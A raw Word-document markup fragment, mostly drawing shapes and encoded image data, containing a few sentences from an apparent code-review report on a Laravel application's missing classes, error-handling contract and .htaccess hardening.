                <v:shape id="Shape 1504" o:spid="_x0000_s1027" style="position:absolute;width:10953;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="10953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08wgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X/A9hhN5qotS6rEYRRei12kOP42bcrG4m6yau2/76piD0No/3OYtV72rRURsqzxrGIwWCuPCm&#10;4lLD52H3koEIEdlg7Zk0fFOA1XLwtMDc+Dt/ULePpUghHHLUYGNscilDYclhGPmGOHEn3zqMCbal&#10;NC3eU7ir5USpN+mw4tRgsaGNpeKyvzkNKvu5XqfW38I5m22709dMRnPU+nnYr+cgIvXxX/xwv5s0&#10;f6pe4e+bdIJc/gIAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAtBG08wgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9526,l1085850,v2630,,4875,930,6735,2778c1094444,4638,1095375,6890,1095375,9525r,114300c1095375,126448,1094444,128687,1092585,130547v-1860,1860,-4105,2791,-6735,2803l9526,133350v-2631,-12,-4876,-943,-6736,-2803c930,128687,,126448,1,123825l1,9525c,6890,930,4638,2790,2778,4650,930,6895,,9526,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1095375,133350"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ReportController</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cartsReport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> referenced </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>App</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\Models\Cart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 class that does not exist, and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">routes/api.php:161 </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pointed at a </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>show(</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method that was never written.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA53D8" w14:textId="097B391C" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="30"/>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A single uniform JSON error contract in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Handler::render()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so an individual controller can no longer get it wrong: unexpected faults return a generic message plus a correlation UUID, with the full exception always logged and detail attached only when </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>config('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>app.debug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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is explicitly true. All ten ungated messages gated. The root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htaccess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> hardened to deny dotfiles, application directories, project metadata and source/data/log </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>extensions</w:t>
      </w:r>
      <w:r w:rsidR="001244A6">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 using</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mod_rewrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> because</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6F5E08" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRPr="005C54CB" w:rsidRDefault="00CA733A" w:rsidP="00CA733A">
      <w:pPr>
        <w:spacing w:after="0" w:line="310" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="64"/>
        <w:jc w:val="both"/>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0688" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="084AE3B3" wp14:editId="3C0DF197">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-1136871</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3448050" cy="1781175"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="28777" name="Group 28777"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3448050" cy="1781175"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="3448050" cy="1781175"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1501" name="Shape 1501"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2381250" y="0"/>
                            <a:ext cx="923925" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="923925" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="914400" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="917030" y="0"/>
                                  <a:pt x="919275" y="930"/>
                                  <a:pt x="921135" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="922995" y="4638"/>
                                  <a:pt x="923925" y="6890"/>
                                  <a:pt x="923925" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="923925" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="923925" y="126448"/>
                                  <a:pt x="922995" y="128687"/>
                                  <a:pt x="921135" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="919275" y="132407"/>
                                  <a:pt x="917030" y="133338"/>
                                  <a:pt x="9144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12" name="Shape 1512"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2324100" y="428625"/>
                            <a:ext cx="1038225" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1038225" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1028700" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1031330" y="0"/>
                                  <a:pt x="1033575" y="930"/>
                                  <a:pt x="1035435" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1037295" y="4638"/>
                                  <a:pt x="1038225" y="6890"/>
                                  <a:pt x="1038225" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1038225" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1038225" y="135979"/>
                                  <a:pt x="1037295" y="138224"/>
                                  <a:pt x="1035435" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1033575" y="141945"/>
                                  <a:pt x="1031330" y="142875"/>
                                  <a:pt x="1028700"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17" name="Shape 1517"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1057275" y="771525"/>
                            <a:ext cx="1162050" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1162050" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1152525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1155155" y="0"/>
                                  <a:pt x="1157400" y="930"/>
                                  <a:pt x="1159260" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1161120" y="4651"/>
                                  <a:pt x="1162050" y="6890"/>
                                  <a:pt x="1162050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1162050" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1162050" y="135973"/>
                                  <a:pt x="1161120" y="138212"/>
                                  <a:pt x="1159260" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1157400" y="141932"/>
                                  <a:pt x="1155155" y="142863"/>
                                  <a:pt x="1152525" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="930" y="138212"/>
                                  <a:pt x="0" y="135973"/>
                                  <a:pt x="0" y="133350"/>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27" name="Shape 1527"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="1123950"/>
                            <a:ext cx="466725" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="466725" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="457200" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="459830" y="0"/>
                                  <a:pt x="462075" y="930"/>
                                  <a:pt x="463935" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="465795" y="4638"/>
                                  <a:pt x="466725" y="6890"/>
                                  <a:pt x="466725" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="466725" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="466725" y="126454"/>
                                  <a:pt x="465795" y="128699"/>
                                  <a:pt x="463935" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="462075" y="132420"/>
                                  <a:pt x="459830" y="133350"/>
                                  <a:pt x="457200" y="133350"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="133350"/>
                                  <a:pt x="4650" y="132420"/>
                                  <a:pt x="2790" y="130559"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="123825"/>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30" name="Shape 1530"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="495300" y="1123950"/>
                            <a:ext cx="695325" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="695325" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="685800" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="688430" y="0"/>
                                  <a:pt x="690675" y="930"/>
                                  <a:pt x="692535" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="694395" y="4638"/>
                                  <a:pt x="695325" y="6890"/>
                                  <a:pt x="695325" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="695325" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="695325" y="126454"/>
                                  <a:pt x="694395" y="128699"/>
                                  <a:pt x="692535" y="130559"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="690675" y="132420"/>
                                  <a:pt x="688430" y="133350"/>
                                  <a:pt x="685800"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36" name="Shape 1536"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="552450" y="1295400"/>
                            <a:ext cx="1047750" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1047750" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1038225" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1040855" y="0"/>
                                  <a:pt x="1043100" y="930"/>
                                  <a:pt x="1044960" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1046820" y="4638"/>
                                  <a:pt x="1047750" y="6890"/>
                                  <a:pt x="1047750" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1047750" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1047750" y="126448"/>
                                  <a:pt x="1046820" y="128687"/>
                                  <a:pt x="1044960" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1043100" y="132407"/>
                                  <a:pt x="1040855" y="133338"/>
                                  <a:pt x="1038225"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39" name="Shape 1539"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2266950" y="1295400"/>
                            <a:ext cx="752475" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="752475" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="742950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="745580" y="0"/>
                                  <a:pt x="747825" y="930"/>
                                  <a:pt x="749685" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="751545" y="4638"/>
                                  <a:pt x="752475" y="6890"/>
                                  <a:pt x="752475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="752475" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="752475" y="126448"/>
                                  <a:pt x="751545" y="128687"/>
                                  <a:pt x="749685" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="747825" y="132407"/>
                                  <a:pt x="745580" y="133338"/>
                                  <a:pt x="742950"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50" name="Shape 1550"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1800225" y="1466850"/>
                            <a:ext cx="1514475" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1514475" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1504950" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1507580" y="0"/>
                                  <a:pt x="1509825" y="930"/>
                                  <a:pt x="1511685" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1513545" y="4638"/>
                                  <a:pt x="1514475" y="6890"/>
                                  <a:pt x="1514475" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1514475" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1514475" y="135973"/>
                                  <a:pt x="1513545" y="138212"/>
                                  <a:pt x="1511685" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1509825" y="141932"/>
                                  <a:pt x="1507580" y="142863"/>
                                  <a:pt x="1504950"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60" name="Shape 1560"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="457200" y="1638300"/>
                            <a:ext cx="400050" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="400050" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="390525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="393155" y="0"/>
                                  <a:pt x="395400" y="930"/>
                                  <a:pt x="397260" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="399120" y="4638"/>
                                  <a:pt x="400050" y="6890"/>
                                  <a:pt x="400050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="400050" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="400050" y="135979"/>
                                  <a:pt x="399120" y="138224"/>
                                  <a:pt x="397260" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="395400" y="141945"/>
                                  <a:pt x="393155" y="142875"/>
                                  <a:pt x="39052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63" name="Shape 1563"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2933699" y="1638300"/>
                            <a:ext cx="514350" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="514350" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="504825" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="507455" y="0"/>
                                  <a:pt x="509701" y="930"/>
                                  <a:pt x="511561" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="513420" y="4638"/>
                                  <a:pt x="514350" y="6890"/>
                                  <a:pt x="514350" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="514350" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="514350" y="135979"/>
                                  <a:pt x="513420" y="138224"/>
                                  <a:pt x="511561" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="509701" y="141945"/>
                                  <a:pt x="507455" y="142875"/>
                                  <a:pt x="50482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1236853" id="Group 28777" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.45pt;margin-top:-89.5pt;width:271.5pt;height:140.25pt;z-index:-251425792" coordsize="34480,1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&#10;